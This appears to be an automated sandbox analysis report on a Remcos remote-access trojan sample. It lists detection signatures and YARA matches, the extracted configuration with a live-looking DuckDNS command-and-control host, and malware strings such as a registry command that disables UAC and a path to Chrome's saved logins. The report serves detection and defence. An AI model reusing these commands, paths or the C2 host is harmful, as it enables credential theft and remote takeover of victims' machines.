
Windows Analysis Report
1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe

Overview

General Information

Sample name:1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
Analysis ID:1559856
MD5:3cc6b6ef2d90a55b3a9cb4b2f9c1526c
SHA1:fbc78cbbc06ab9f435fd3ec2fc46cf3a8c433dcf
SHA256:eafb4332827f8e2eccc30716537cfb9fdc3112b369d519b1fdfd9c5b39b8f1ce
Tags:base64-decoded, exe, user-abuse_ch

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for sample
Uses dynamic DNS services
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Malware configuration (Remcos): {"Host:Port:Password": ["remcos2025rem.duckdns.org:1213:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8AGIM5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source / Rule / Description / Author / Strings (submitted sample)
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]

Source / Rule / Description / Author / Strings (dropped files)
Source: C:\ProgramData\remcos\registros.dat, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security

Source / Rule / Description / Author / Strings (memory dumps)
Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown
  • 0x134b8:$a1: Remcos restarted by watchdog!
  • 0x13a30:$a3: %02i:%02i:%02i:%03i
Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security

Source / Rule / Description / Author / Strings (unpacked PEs)
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]

                        Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details [...] EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, ProcessId: 5000, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-8AGIM5\exepath

Suricata alerts (Timestamp / SID / Severity / Classtype / Source IP / Source Port / Destination IP / Destination Port / Protocol):
Timestamp: 2024-11-21T01:07:03.504324+0100, SID: 2036594, Severity: 1, Classtype: Malware Command and Control Activity Detected, Source IP: 192.168.2.5, Source Port: 49704, Destination IP: 186.169.34.190, Destination Port: 1213, Protocol: TCP
Timestamp: 2024-11-21T01:07:06.213772+0100, SID: 2803304, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.5, Source Port: 49705, Destination IP: 178.237.33.50, Destination Port: 80, Protocol: TCP

                        AV Detection

Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Avira: detected
Source: remcos2025rem.duckdns.org | Avira URL Cloud: Label: malware
Source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["remcos2025rem.duckdns.org:1213:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8AGIM5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | ReversingLabs: Detection: 86%
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Virustotal: Detection: 86%
Source: Yara match | File source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_004338C8
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_a7eec4ca-9

                        Exploits

Source: Yara match | File source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR

                        Privilege Escalation

Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00407538 _wcslen,CoGetObject,0_2_00407538
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0044E8F9 FindFirstFileExA,0_2_0044E8F9
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2

                        Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49704 -> 186.169.34.190:1213
Source: Malware configuration extractor | URLs: remcos2025rem.duckdns.org
Source: unknown | DNS query: name: remcos2025rem.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 186.169.34.190:1213
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View | ASN Name: COLOMBIATELECOMUNICACIONESSAESPCO COLOMBIATELECOMUNICACIONESSAESPCO
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49705 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041B411
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: remcos2025rem.duckdns.org
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000003.2071467066.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.4476280877.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2071467066.0000000000694000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2071467066.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.4476280877.0000000000694000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.4476280877.00000000006A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp(1
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp91n
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, 00000000.00000002.4476280877.0000000000683000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2071467066.0000000000683000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 0_2_0040A2F3
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168FC
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A41B
Source: Yara match | File source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR

                        E-Banking Fraud

Source: Yara match | File source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041CA73 SystemParametersInfoW,0_2_0041CA73

                        System Summary

                        barindex
                        Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | type: SAMPLE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | type: SAMPLE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 0.2.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 0.0.1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe.400000.0.unpack | type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp | type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp | type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: Process Memory Space: 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe PID: 5000 | type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle | 0_2_0041330D
Source: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | Code function: 0_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle | 0_2_0041BBC6
